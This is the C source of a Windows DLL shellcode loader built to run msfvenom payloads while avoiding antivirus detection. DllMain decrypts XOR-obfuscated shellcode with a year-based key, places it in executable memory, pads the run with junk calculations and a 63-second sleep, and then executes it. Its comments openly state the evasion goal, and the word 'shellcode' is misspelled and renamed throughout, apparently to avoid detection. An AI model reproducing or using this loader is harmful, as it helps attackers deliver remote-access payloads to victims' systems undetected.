#include <windows.h>
#include <stdio.h>
#include <string.h> 

/* 
 This program executes sh3llcode stored in the hamdinger_data.h header.
 The hamdinger_data.h header is generated by the complimentary xor_encrypt.py 
 script. For the purpose of this DLL, xor_encrypt.py should be used to encrypt
 raw shell code generated by msfvenom.

 This may seem redundant, becuase msfvenom can already do this, but this
 gets caught less often ¯\_(ツ)_/¯

 It's on you to pick the msf PAYLOAD and LHOST config.
 
*/

// 1. Include the generated header file (now containing the encrypted hamdinger)
#include "hamdinger_data.h" 

// 2. Hardcoded key part (MUST match the Python script's -k argument)
#define HARDCODED_KEY_PART "LudicrousGibs" 
#define MAX_KEY_LEN 100

// Define the function pointer type for the hamdinger (executable payload)
// Renamed from ##ELLCODE_FUNC to HAMDINGER_FUNC
typedef void (*HAMDINGER_FUNC)(); 

// Function to perform XOR decryption
void xor_decrypt(unsigned char* data, unsigned int data_len, const char* key) {
    unsigned int key_len = strlen(key);
    for (unsigned int i = 0; i < data_len; i++) {
        data[i] ^= key[i % key_len];
    }
}

DWORD perform_useless_calculations(int a, int b, int c, int d) {
    // Use system time as a pseudo-random seed/modifier
    DWORD tick = GetTickCount(); 
    DWORD result = 0;

    // Complex chain of arithmetic operations, bitwise shifts, and bitwise logic
    result = (a * 1024 + b) / 3;
    result ^= (c << (tick % 8));       // Bitwise shift modified by system tick
    result += (d | (tick & 0xFF));     // Bitwise OR and AND
    result = (result * (a + c)) % 997; // Modular arithmetic with large prime
    result *= tick;                    // Multiply by tick count
    result >>= (b % 4);                // Final shift

    // The return value is unused but forces the calculation to occur
    return result; 
}

// The main entry point for a Windows DLL
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    
    if (fdwReason == DLL_PROCESS_ATTACH) {
        
        DisableThreadLibraryCalls(hinstDLL);

        // --- 1. Dynamic Key Generation ---
        SYSTEMTIME st;
        char full_key[MAX_KEY_LEN];
        char year_str[5];
        
        GetLocalTime(&st);
        _snprintf(year_str, sizeof(year_str), "%d", st.wYear);
        
        // Build the full decryption key
        strcpy(full_key, HARDCODED_KEY_PART);
        strcat(full_key, year_str);

        printf("DLL Attached. Decrypting hamdinger with key: '%s'\n", full_key);

        // --- 2. Decryption (XOR Loop) ---
        
        // Allocate executable memory for the decrypted hamdinger
        unsigned char* decrypted_hamdinger = (unsigned char*)VirtualAlloc(
            NULL, 
            hamdinger_len, // Renamed length variable (assuming you update the header)
            MEM_COMMIT | MEM_RESERVE, 
            PAGE_EXECUTE_READWRITE
        );

        if (decrypted_hamdinger == NULL) {
            printf("Error: VirtualAlloc failed.\n");
            return FALSE;
        }

        // Copy encrypted data into the executable buffer
        RtlMoveMemory(decrypted_hamdinger, encrypted_hamdinger, hamdinger_len);
        
        // Perform XOR decryption in-place 
        xor_decrypt(decrypted_hamdinger, hamdinger_len, full_key);

        printf("Hamdinger successfully decrypted. Length: %u bytes.\n", hamdinger_len);

        perform_useless_calculations(4, 15, 7, 9);

        // --- 3. Introduce Delay ---
        
        printf("Sleeping for seconds before hamdinger execution...\n");
        Sleep(63000); 

        // --- 4. Execution ---
        
        perform_useless_calculations(3, 2, 17, 5);
        printf("Executing hamdinger...\n");
        // Cast the allocated memory address to the hamdinger function pointer
        HAMDINGER_FUNC HamdingerFunction = (HAMDINGER_FUNC)decrypted_hamdinger;
        
        // Execute the decrypted hamdinger
        HamdingerFunction(); 
        
        printf("Hamdinger execution finished.\n");
        VirtualFree(decrypted_hamdinger, 0, MEM_RELEASE);
    }
    
    return TRUE;
}
